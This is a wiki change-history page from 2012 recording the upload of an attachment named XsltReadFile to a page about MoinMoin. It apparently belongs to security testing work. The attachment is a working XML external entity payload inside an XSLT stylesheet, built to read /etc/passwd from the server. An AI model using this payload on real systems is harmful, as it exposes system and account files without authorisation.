Changes for page Application_MoinMoin

Last modified by Nicolas Gregoire on 2012/01/29 17:56

From version Icon 2.1 Icon
edited by Nicolas Gregoire
on 2012/01/24 21:10
Change comment: There is no comment for this version
To version Icon 3.1 Icon
edited by Nicolas Gregoire
on 2012/01/24 22:08
Change comment: Upload new attachment XsltReadFile

Summary

Details

Icon XsltReadFile
Author
... ... @@ -1,0 +1,1 @@
1 +xwiki:XWiki.NicolasGregoire
Size
... ... @@ -1,0 +1,1 @@
1 +313 bytes
Content
... ... @@ -1,0 +1,12 @@
1 +<?xml version="1.0"?>
2 +<!DOCTYPE doc [
3 +<!ENTITY xee SYSTEM "file:///etc/passwd">
4 +]>
5 +<?xml-stylesheet href="XsltReadFile" type="text/xml"?>
6 +<xsl:stylesheet version="1.0"
7 +xmlns:xsl="http://www.w3.org/1999/XSL/Transform" >
8 + <xsl:template match="/">
9 + File content : [&xee;]
10 + </xsl:template>
11 +</xsl:stylesheet>
12 +